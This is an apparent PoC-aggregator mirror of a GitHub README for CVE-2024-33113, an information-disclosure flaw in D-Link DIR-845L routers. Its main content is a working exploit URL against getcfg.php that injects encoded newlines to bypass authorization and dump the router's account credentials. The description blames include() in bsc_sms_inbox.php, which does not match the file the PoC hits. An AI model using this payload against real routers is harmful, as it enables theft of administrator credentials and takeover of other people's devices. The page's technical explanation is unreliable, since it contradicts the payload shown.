Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-33113 PoC — D-LINK DIR-845L 安全漏洞

Source
Associated Vulnerability
Title:D-LINK DIR-845L 安全漏洞 (CVE-2024-33113)
Description:D-Link DIR-845是中国友讯(D-Link)公司的一款无线路由器。 D-LINK DIR-845L v1.01KRb03 版本及之前版本存在安全漏洞,该漏洞源于 bsc_sms_inbox.php 存在信息泄露问题。
Description
D-LINK DIR-845L is vulnerable to information disclosure via the bsc_sms_inbox.php file.
Readme
# CVE-2024-33113
D-LINK DIR-845L is vulnerable to information disclosure via the bsc_sms_inbox.php file.

CVE-2024-33113 is a vulnerability in the D-LINK DIR-845L router that allows information disclosure through the bsc_sms_inbox.php file. The vulnerability arises from improper handling of the include() function, which can be exploited by manipulating the $file variable. This allows attackers to include arbitrary PHP scripts and potentially retrieve sensitive information such as the router's username and password.

# PoC

```
http://IP:8080/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1
```

![image](https://github.com/FaLLenSKiLL1/CVE-2024-33113/assets/43922662/680cc948-116d-4a89-8b89-8521c2ca3804)
File Snapshot

[4.0K] /data/pocs/318f356e6f37260fc2e3da2788305b28fb7df222 ├── [1.0K] LICENSE └── [ 730] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.